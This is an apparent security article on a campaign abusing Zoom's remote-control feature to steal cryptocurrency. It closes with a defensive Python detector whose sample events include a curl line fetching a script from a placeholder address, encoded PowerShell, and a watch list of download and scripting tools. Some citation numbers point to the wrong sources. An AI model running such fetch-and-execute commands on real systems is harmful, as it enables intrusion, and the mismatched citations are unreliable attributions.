A North Korean hacking group known as Elusive Comet has been exploiting Zoom’s remote control feature to steal cryptocurrency from targeted victims. The attackers use social engineering tactics to trick users into granting them access to their machines, allowing them to deploy malware and exfiltrate sensitive data. This campaign has been linked to millions in stolen funds, including a $1.5 billion heist from Bybit in February 2025 [1].
Attack Methodology and Tactics
The attackers pose as venture capitalists, podcast hosts, or journalists to lure victims into joining Zoom calls. Once connected, they abuse Zoom’s remote control feature, which is enabled by default, to request control of the victim’s shared screen. The hackers spoof their display name as “Zoom” so that the permission prompt appears to come from the application itself rather than from another participant [2]. Once granted access, they deploy infostealers and remote access trojans (RATs) to harvest credentials, browser sessions, and cryptocurrency seed phrases. The campaign primarily targets cryptocurrency traders, financial professionals, and enterprises with high-value digital assets.
According to SecurityWeek, the group uses phishing lures with Calendly and Zoom links to schedule meetings. The attackers also leverage macOS accessibility permissions and UI ambiguity to escalate privileges [3]. Trail of Bits researchers confirmed that the hackers impersonated Bloomberg producers in some cases, further demonstrating their sophisticated social engineering tactics.
Mitigation and Defense Strategies
Security experts recommend disabling Zoom’s remote control feature at the administrative level to prevent abuse. Additional defensive measures include:
- Training users to verify permission prompts before granting access
- Monitoring for unusual Zoom process activity in endpoint detection systems
- Implementing technical controls to block remote control functionality
BleepingComputer reports that the campaign has a global reach, with Japanese brokers losing $700 million to similar tactics [4]. The attacks have been linked to the Lazarus Group, a known North Korean state-sponsored threat actor [5].
Technical Analysis of the Exploit Chain
The attack chain relies heavily on social engineering rather than technical vulnerabilities in Zoom’s software. However, the default-enabled remote control feature provides an easy avenue for exploitation. CyberPress analysis suggests the group uses stolen certificates and keys in parallel attacks to maintain persistence [6].
Security teams should pay particular attention to Zoom processes spawning unusual child processes or making unexpected network connections. The attackers have been observed deploying clipboard hijackers to intercept cryptocurrency transactions, making behavioral detection crucial for defense.
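The following script is an added illustration of the process-lineage detection described above; it is not code from the article or from any of the cited vendors. It scans constructed EDR-style process-start events (JSON lines) and flags children of the Zoom client that are not known Zoom helpers, rating scripting and download tools as high severity. The event schema, the helper allowlist, the hostnames, users and the 198.51.100.10 address are all assumptions made up for the example; a real deployment would derive the allowlist from baseline telemetry.

```python
import json
from typing import Optional

# Constructed sample telemetry, loosely modelled on EDR process-start events.
SAMPLE_EVENTS = r"""
{"ts":"2025-04-17T10:01:02Z","host":"mac-trader-01","user":"alice","parent":"/Applications/zoom.us.app/Contents/MacOS/zoom.us","image":"/Applications/zoom.us.app/Contents/Frameworks/CptHost.app/Contents/MacOS/CptHost","cmdline":"CptHost"}
{"ts":"2025-04-17T10:04:40Z","host":"mac-trader-01","user":"alice","parent":"/Applications/zoom.us.app/Contents/MacOS/zoom.us","image":"/usr/bin/osascript","cmdline":"osascript -e do shell script"}
{"ts":"2025-04-17T10:04:41Z","host":"mac-trader-01","user":"alice","parent":"/Applications/zoom.us.app/Contents/MacOS/zoom.us","image":"/usr/bin/curl","cmdline":"curl -s http://198.51.100.10/s.sh"}
{"ts":"2025-04-17T10:04:45Z","host":"mac-trader-01","user":"alice","parent":"/Applications/zoom.us.app/Contents/MacOS/zoom.us","image":"/private/tmp/.helper","cmdline":".helper"}
{"ts":"2025-04-17T10:05:00Z","host":"win-ops-07","user":"bob","parent":"C:\\Users\\bob\\AppData\\Roaming\\Zoom\\bin\\Zoom.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell -enc ..."}
{"ts":"2025-04-17T10:06:00Z","host":"win-ops-07","user":"bob","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd"}
"""

# Assumed names: the Zoom client binaries and the helper processes it normally spawns.
ZOOM_PROCESSES = {"zoom.us", "zoom.exe"}
ZOOM_HELPERS = {"cpthost", "aomhost"}
# Interpreters and download tools that the Zoom client has no business launching.
SCRIPT_AND_DOWNLOAD_TOOLS = {
    "osascript", "sh", "bash", "zsh", "python3", "curl", "wget",
    "powershell.exe", "cmd.exe", "mshta.exe", "rundll32.exe",
    "wscript.exe", "cscript.exe", "certutil.exe", "regsvr32.exe",
}

def basename(path: str) -> str:
    """Last path component, lower-cased, tolerating both / and \\ separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(event: dict) -> Optional[str]:
    """Severity for a process-start event, or None when it is not a Zoom child worth flagging."""
    if basename(event["parent"]) not in ZOOM_PROCESSES:
        return None                       # not spawned by the Zoom client
    child = basename(event["image"])
    if child in ZOOM_PROCESSES or child in ZOOM_HELPERS:
        return None                       # expected helper; tune from baseline telemetry
    return "high" if child in SCRIPT_AND_DOWNLOAD_TOOLS else "medium"

def scan(jsonl: str) -> list:
    """Return one finding dict per flagged event, in input order."""
    findings = []
    for line in jsonl.strip().splitlines():
        event = json.loads(line)
        severity = classify(event)
        if severity:
            findings.append({"severity": severity, "ts": event["ts"], "host": event["host"],
                             "user": event["user"], "child": basename(event["image"]),
                             "cmdline": event["cmdline"]})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity'].upper()}] {f['ts']} {f['host']} {f['user']}: zoom -> {f['child']} ({f['cmdline']})")
```

The same lineage rule can be expressed as a SIEM query (parent process name in the Zoom set, child not in the helper set) to alert on live telemetry rather than a captured file.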
This campaign highlights the growing trend of attackers abusing legitimate collaboration tools for malicious purposes. As remote work continues to be prevalent, organizations must balance functionality with security when configuring these platforms.
References
- [1] “North Korean cryptocurrency thieves caught hijacking Zoom remote control feature,” SecurityWeek, [Online]. Available: https://www.securityweek.com/north-korean-cryptocurrency-thieves-caught-hijacking-zoom-remote-control-feature/
- [2] “Mitigating Elusive Comet Zoom Remote Control Attacks,” Trail of Bits, Apr. 17, 2025. [Online]. Available: https://blog.trailofbits.com/2025/04/17/mitigating-elusive-comet-zoom-remote-control-attacks/
- [3] “Hackers abuse Zoom remote control feature for crypto-theft attacks,” BleepingComputer, [Online]. Available: https://www.bleepingcomputer.com/news/security/hackers-abuse-zoom-remote-control-feature-for-crypto-theft-attacks/
- [4] “Risky Bulletin: Zoom has a remote control feature and crypto thieves are abusing it,” Risky Biz, [Online]. Available: https://news.risky.biz/risky-bulletin-zoom-has-a-remote-control-feature-and-crypto-thieves-are-abusing-it/
- [5] “Hackers Abuse Zoom’s Remote Control,” GBHackers, [Online]. Available: https://gbhackers.com/hackers-abuse-zooms-remote-control/
- [6] “Zoom Remote Control Exploited,” CyberPress, [Online]. Available: https://cyberpress.org/zoom-remote-control-exploited/